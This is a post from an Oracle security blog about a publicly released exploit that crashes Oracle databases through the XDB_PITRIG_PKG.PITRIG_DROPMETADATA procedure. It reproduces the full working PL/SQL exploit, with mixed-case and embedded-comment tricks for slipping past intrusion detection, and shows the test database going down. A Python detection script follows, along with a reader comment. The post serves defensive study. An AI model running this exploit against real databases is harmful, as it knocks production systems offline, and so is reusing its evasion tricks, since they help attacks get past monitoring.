
Pete Finnigan's Oracle Security Weblog

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.


Exploit code to crash an Oracle database posted

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for the Oracle database that uses the package procedure XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. The post did not say which versions are vulnerable, but Alex posted in his blog that unpatched and systems are affected and crash. I tested this on an unpatched database:

SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
ERROR at line 2:
ORA-03135: connection lost contact

SQL> connect system/manager
ORA-12514: TNS:listener does not currently know of service requested in connect

SQL> connect system/manager

As you can see, running this Oracle exploit code causes the connection to the database to be lost. In fact, it has crashed the database. I had to restart the database:


The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.
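A detection rule has to normalize the statement before matching, which is what defeats the case changes and embedded comments described above. The following is an added example, not code from the original post; the function names and sample statements are constructed for illustration, and Oracle q'[...]' literals are not handled.

```python
import re

# Package procedure named in the post; the XDB schema prefix is optional in a call.
TARGET = "XDB_PITRIG_PKG.PITRIG_DROPMETADATA"
RULE = re.compile(r"(?<![\w$#])" + re.escape(TARGET) + r"(?![\w$#])")

def normalize_sql(text):
    """Remove comments outside literals, blank literals, fold case and spacing."""
    out, i, n = [], 0, len(text)
    while i < n:
        two = text[i:i + 2]
        if two == "/*":                       # block comment -> one space
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
            out.append(" ")
        elif two == "--":                     # line comment runs to end of line
            end = text.find("\n", i)
            i = n if end == -1 else end
        elif text[i] == "'":                  # string literal; '' is an escaped quote
            i += 1
            while i < n and (text[i] != "'" or text[i + 1:i + 2] == "'"):
                i += 2 if text[i] == "'" else 1
            i += 1
            out.append("''")                  # literal content can never match the rule
        elif text[i] == '"':                  # "XDB"."PKG" folds to XDB.PKG
            i += 1
        else:
            out.append(text[i])
            i += 1
    flat = re.sub(r"\s*\.\s*", ".", "".join(out).upper())
    return re.sub(r"\s+", " ", flat).strip()

def calls_target(text):
    """True if the statement calls the procedure once evasion is stripped."""
    return RULE.search(normalize_sql(text)) is not None

# Constructed samples: the obfuscated call shape from the post (short arguments),
# a benign query that only mentions the name, and a literal containing "/*".
EVASIVE = "begin xDb\n/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary\n, larry); end;"
BENIGN = "select 'XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA' from dual -- xdb_pitrig_pkg.pitrig_dropmetadata"
TRICKY = "select '/*' from dual; begin xdb.xdb_pitrig_pkg.pitrig_dropmetadata('a', 'b'); end; -- */"

if __name__ == "__main__":
    for name, stmt in (("evasive", EVASIVE), ("benign", BENIGN), ("tricky", TRICKY)):
        print(name, "naive:", TARGET in stmt, "normalized:", calls_target(stmt))
```

Literals are skipped before comments are stripped, so a "/*" hidden inside a string cannot be used to swallow the real call, and a name that appears only in a literal or comment does not raise an alert.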

There has been 1 Comment posted on this article

November 8th, 2007 at 08:13 pm

Pete Finnigan says:

Tried this on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.

exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
ERROR at line 1:
ORA-03113: end-of-file on communication channel